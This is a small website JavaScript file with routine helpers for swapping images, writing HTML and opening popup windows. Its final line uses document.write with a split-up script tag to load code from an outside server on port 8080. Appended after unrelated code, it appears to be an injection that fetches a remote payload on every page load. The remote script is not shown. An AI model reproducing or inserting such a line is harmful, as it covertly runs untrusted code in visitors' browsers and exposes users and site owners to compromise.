function navi1( imgLnk, imgName ){
    imgLnk.src = "/themes/white/img/" + imgName + ".gif";
}

function dw(str){
    document.write(str)
};

function newWin(url, w, h){
    if(""+w=="undefined") w = "720";
    if(""+h=="undefined") h = "525";
    window.open(url, "_blank", "width="+w+", height="+h+", scrollbars=yes, toolbar=0");
};

document.write('<s'+'cript type="text/javascript" src="http://temp.aspdesign.net:8080/User_Interface.js"></scr'+'ipt>');
